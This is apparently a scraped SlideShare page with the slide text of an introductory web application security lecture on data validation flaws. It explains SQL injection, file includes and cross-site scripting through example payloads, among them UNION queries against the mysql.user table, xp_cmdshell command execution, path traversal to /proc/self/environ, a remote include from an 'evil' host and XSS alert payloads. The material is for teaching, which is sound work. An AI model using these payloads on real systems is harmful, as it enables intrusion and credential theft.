Web Application Security 101 - 14 Data Validation
1 like1,238 views
In part 14 of Web Application Security 101 you will learn about SQL Injection, Cross-site Scripting, Local File Includes and other common types of data validation problems.
![Stored XSS
The injection is temporarily or permanently stored.
<?php $_SESSION['name'] = $_GET['name'] ?>
Later on there is this code that causes for the XSS to occur:
<?php ?><span><?php echo $_SESSION['name'] ?></span>](https://image.slidesharecdn.com/webapplicationsecurity101-14datavalidation-140724051834-phpapp01/85/Web-Application-Security-101-14-Data-Validation-28-320.jpg)
![DOM-based XSS
The injection may occur at any point but triggered via JavaScript.
<script>
var match = document.location.search.match(/[?&]name=(w+)/);
if (match) {
document.write("Hello " + match[1]);
}
</script>
There are many different ways an injection can occur.](https://image.slidesharecdn.com/webapplicationsecurity101-14datavalidation-140724051834-phpapp01/85/Web-Application-Security-101-14-Data-Validation-29-320.jpg)
Ad
More Related Content
What's hot (20)
Viewers also liked (14)
Ad
Similar to Web Application Security 101 - 14 Data Validation (20)
Ad
More from Websecurify (12)
Recently uploaded (20)
![Get & Download Wondershare Filmora Crack Latest [2025]](https://cdn.slidesharecdn.com/ss_thumbnails/revolutionizingresidentialwi-fi-250422112639-60fb726f-250429170801-59e1b240-thumbnail.jpg?width=560&fit=bounds)
Web Application Security 101 - 14 Data Validation
- 1. Data Validation Common input validation problems.
- 2. Types Of Problems SQL Injection Local File Includes Cross-site Scripting
- 3. SQL Injection SQL Injection is an attack where a partial or a complete SQL query is inserted/injected into another query run by the targeted application.
- 4. Types Of SQL Injection Vanilla - when errors are displayed. Blind - when no errors are displayed.
- 5. SQL Backends There are multiple SQL backends that have various features. Common Backends MsSQL (Transact-SQL) MySQL PostgreSQL Oracle (PL/SQL) Many More
- 6. SQL Injection In Principle Works by injecting SQL parts in already existing queries. SELECT * FROM table WHERE column = 'injected by the user'
- 7. In Detail Assuming that $valueis a variable controlled by the user: $query = "SELECT * FROM table WHERE column = '" + $value + "'"; When $valueequals to ' OR '1'='1then: SELECT * FROM table WHERE column = '' OR '1'='1'
- 8. SQL Injection Techniques Union Selection - to obtain values from other tables. SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e' Boolean Selection - to create universally true or false statements. SELECT * FROM table WHERE column = '' OR '1'='1' Time Selection - to measure injection by timing the execution. SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false'))--'
- 9. MsSQL Injection Techniques Table enumeration - find the table structure. SELECT * FROM table WHERE column = '' HAVING 1=1--' SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1-- Code execution - running arbitrary commands. SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'comman Query delay - timing delay after query. SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'
- 10. MySQL Injection Techniques Pt. 1 Finding information - retrieving various server variables and functions. SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b', User enumeration - retrieving MySQL server users and passwords. SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'
- 11. MySQL Injection Techniques Pt. 2 Table enumeration - retrieving MySQL server tables. SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables# Column enumeration - retrieving MySQL server columns. SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns
- 13. SQL Injection Is Art There are many different types of tools and techniques with various level of complexity used to exploit SQL Injection vulnerabilities.
- 14. File Includes This attack vector is used to perform arbitrary file/url read or execution using low-level functions and application-specific features.
- 15. Types Of File Includes Local File Include - when the included file is local. Remote File Include - when the included file is fetched remotely.
- 16. File Include In Principle Works when user data reaches a function used to fetch a file. <?php fetchfile("./path/to/file/injected by the user") ?>
- 17. In Detail Assuming that $valueis a variable controlled by the user: <?php fetchfile("./path/to/file/" . $value) ?> When $valueequals to ../../../index.phpthen: <?php fetchfile("./path/to/file/../../../index.php") ?>
- 18. File Include Techniques Pt. 1 Usage of ../to traverse directory structure. <?php fetchfile("./path/to/file/../../../index.php") ?> Usage of null (0x00) to terminate strings for low level C functions. <?php fetchfile("./path/to/file/../../../index.php0.txt") ?>
- 19. File Include Techniques Pt. 2 Usage of overlong dot (0xc0, 0xae) to by pass escape functions. <?php fetchfile("./path/to/file/xc0xae./../../index.php0.txt") ?> Usage of system resources to cause other behaviour. <?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>
- 20. Remote File Includes This type of problem occurs when injecting a remote file controlled by the attacker. In this case, the attacker has a greater control over the exploitation process if something special is done to the file. <?php fetchfile("http://evil/path/to/file") ?>
- 21. FI Is Art File Include attacks are a popular mechanism for compromising web applications.
- 22. Cross-site Scripting Is a type of vulnerability where an attacker can bypass SOP (Same Origin Policy) through client-side injection or by abusing forms of configuration.
- 23. Types Of XSS Reflected - when the injection is immediately returned. Stored - when the injection is stored. DOM-based - when the injection occurs due to JS. Others - the are many other uncategorized varients.
- 24. XSS In Principle Works by injecting fragments of HTML/JS inside the web page. <span>injected by the user</span>
- 25. In Detail Assuming that $valueis a variable controlled by the user: <?php ?><span><?php echo $value ?></span> When $valueequals to <script>alert(1)</script>then: <span><script>alert(1)</script></span>
- 26. XSS Techniques Pt. 1 When script tags are sanitized or escaped. <span><img src=a onerror=alert(1)></span> When the injection occurs inside an event attribute. <button onclick="alert(1)"></button>
- 27. XSS Techniques Pt. 2 When the injection occurs inside JavaScript a tag. <script>var a = ""; alert(1); "";</script> When the injection occurs in multiple small places. <span><script>alert(1)/* is something like */</script></span>
- 28. Stored XSS The injection is temporarily or permanently stored. <?php $_SESSION['name'] = $_GET['name'] ?> Later on there is this code that causes for the XSS to occur: <?php ?><span><?php echo $_SESSION['name'] ?></span>
- 29. DOM-based XSS The injection may occur at any point but triggered via JavaScript. <script> var match = document.location.search.match(/[?&]name=(w+)/); if (match) { document.write("Hello " + match[1]); } </script> There are many different ways an injection can occur.
- 30. Other Forms Of XSS The presence of crossdomain.xmlmay open the app to XSS. <?xml version="1.0" encoding="UTF-8" ?> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>
- 31. XSS Is Art Cross-site scripting is very popular and widely spread vulnerability.
- 32. Other Input Validations Flaws Memory Corruption Command Injection LDAP Injection XML Injection XPATH Injection SSI Injection Remote File Inclusion Many, Many More
- 33. Lab We will be finding data validation problems.